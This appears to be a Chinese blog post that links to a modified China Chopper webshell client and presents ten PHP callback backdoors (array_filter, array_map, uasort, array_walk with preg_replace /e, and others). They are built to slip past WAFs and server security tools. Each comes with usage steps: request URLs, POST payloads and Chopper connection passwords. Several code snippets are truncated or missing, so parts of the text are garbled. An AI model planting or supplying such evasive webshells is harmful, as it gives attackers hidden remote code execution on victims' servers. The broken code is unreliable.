php回调后门,php过WAF一句话,php最新一句话,php过狗一句话.

中国菜刀下载,基于原版中国菜刀优化版20160309.

下载地址:

http://download.csdn.net/detail/settoken/9457567

http://pan.baidu.com/s/1jHoJxHW

China chopper

http://pan.baidu.com/s/1eRxEYjC

分享一下,一些不需要动态函数、不用eval、不含敏感函数、免杀免拦截 过WAF的一句话.

有同学收集tips,就有同学创造tips。那么我们怎么来创造一些过狗、过D盾、无动态函数、无危险函数(无特征)的一句话(后门)?
根据上面这个pdo的一句话,我就可以得到一个很具有普适性的结论:php中包含回调函数参数的函数,具有做后门的潜质。
我就自己给这类webshell起了个名字:回调后门.

下面是收集并整理的各种一句话,带使用方法.

第一个:array_filter+base64_decode

用法:

http://www.xxx.com/settoken.php?e=YXNzZXJ0

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=YXNzZXJ0

密码:settoken


第二个:array_map+base64_decode

用法:

http://www.xxx.com/settoken.php?e=YXNzZXJ0

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=YXNzZXJ0

密码:settoken


第三个:uasort+base64_decode

 1, $_REQUEST['settoken'] => 2);
uksort($arr, $e);
?>

用法:

http://www.xxx.com/settoken.php?e=YXNzZXJ0

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=YXNzZXJ0

密码:settoken


再给出这两个函数,面向对象的方法:
// way 0
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
 
// way 1
$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
$arr->uksort('assert');


再来两个类似的回调后门:
$e = $_REQUEST['e'];
$arr = array(1);
$e = $_REQUEST['e'];
 
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);

以上几个都是可以直接菜刀连接的一句话,但目标PHP版本在5.4.8及以上才可用.

php中,可以执行代码的函数:
1: 一个参数:assert
2: 两个参数:assert(php5.4.8+)
3: 三个参数:preg_replace /e模式

三个参数可以用preg_replace。所以我这里构造了一个array_walk+preg_replace的回调后门:

第四个:array_walk+preg_replace

 '|.*|e',);
array_walk($arr, $e, '');
?>

用法:

http://www.xxx.com/settoken.php?e=preg_replace

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=preg_replace

密码:settoken

这个后门可以在php5.3下使用.


第五个:array_walk_recursive+preg_replace

 '|.*|e',);
array_walk_recursive($arr, $e, '');
?>

用法:

http://www.xxx.com/settoken.php?e=preg_replace

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=preg_replace

密码:settoken


看了以上几个回调后门,发现preg_replace确实好用.但显然很多WAF和安全狗 DD盾什么的早就盯上这个函数了.其实php里不止这个函数可以执行eval的功能,还有几个类似的:
第六个:

第七个:

第六个 第七个的用法:

http://www.xxx.com/settoken.php?e=assert

浏览器提交POST:settoken=phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=assert

密码:settoken


推荐这个单参数后门,在各个版本都比较好驾驭. 这里给出几个好用不杀的回调后门
第八个:

这个是php全版本支持的,且不报不杀稳定执行.

用法:

浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();

即可执行phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=assert

密码:settoken

第九个:

用法:

浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();

即可执行phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=assert

密码:settoken

第十个:

 'assert')); ?>

用法:

浏览器GET提交:http://www.xxx.com/settoken.php?e=assert&settoken=phpinfo();

即可执行phpinfo();

菜刀连接用法:http://www.xxx.com/settoken.php?e=assert

密码:settoken

来源于网络收集,并整理. 好吧,本次就推荐这个10个php一句话,有问题请给我留言.

你可能感兴趣的:(菜刀php一句话,中国菜刀一句话下载,中国菜刀最新版下载,2016最新中国菜刀下载,中国菜刀下载)